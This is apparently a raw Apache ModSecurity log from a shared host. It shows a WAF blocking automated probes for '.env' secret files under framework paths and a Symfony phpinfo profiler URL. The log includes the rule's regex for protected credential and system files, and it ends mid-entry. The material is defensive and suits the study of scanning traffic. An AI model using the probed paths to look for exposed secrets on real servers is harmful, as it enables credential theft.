[Tue May 26 14:53:31.507844 2026] [security2:error] [pid 662057:tid 662284] [client 213.209.159.175:56920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/laravel/.env"] [unique_id "ahVmk_T3lMm9tGFVg9RJSQAAAWs"]
[Tue May 26 14:53:32.715673 2026] [security2:error] [pid 658374:tid 658579] [client 74.249.173.207:4800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/function/function.php"] [unique_id "ahVmlJ1Mb7_aby-E0Kcq_gAAAEs"]
[Tue May 26 14:53:32.926422 2026] [security2:error] [pid 662057:tid 662291] [client 213.209.159.175:56944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/core/.env"] [unique_id "ahVmlPT3lMm9tGFVg9RJVwAAAXI"]
[Tue May 26 14:53:33.376396 2026] [security2:error] [pid 658374:tid 658545] [client 213.209.159.175:56960] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/app/.env"] [unique_id "ahVmlZ1Mb7_aby-E0KcrCgAAACk"]
[Tue May 26 14:53:33.976759 2026] [security2:error] [pid 662057:tid 662204] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmlfT3lMm9tGFVg9RJZQAAARs"]
[Tue May 26 14:53:34.374112 2026] [security2:error] [pid 658374:tid 658586] [client 213.209.159.175:56984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/dev/.env"] [unique_id "ahVmlp1Mb7_aby-E0KcrEwAAAFI"]
[Tue May 26 14:53:35.799091 2026] [security2:error] [pid 662057:tid 662252] [client 213.209.159.175:57016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/server/.env"] [unique_id "ahVml_T3lMm9tGFVg9RJgwAAAUs"]
[Tue May 26 14:53:36.172840 2026] [security2:error] [pid 658374:tid 658614] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVml51Mb7_aby-E0KcrOwAAAG4"]
[Tue May 26 14:53:37.207836 2026] [security2:error] [pid 658374:tid 658531] [client 213.209.159.175:52510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/staging/.env"] [unique_id "ahVmmZ1Mb7_aby-E0KcrcAAAABs"]
[Tue May 26 14:53:37.652030 2026] [security2:error] [pid 658374:tid 658504] [client 213.209.159.175:52512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "162.215.241.212"] [uri "/app_dev.php/_profiler/phpinfo"] [unique_id "ahVmmZ1Mb7_aby-E0KcrfgAAAAA"]
[Tue May 26 14:53:37.981761 2026] [security2:error] [pid 658374:tid 658526] [client 74.249.173.207:4831] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname " |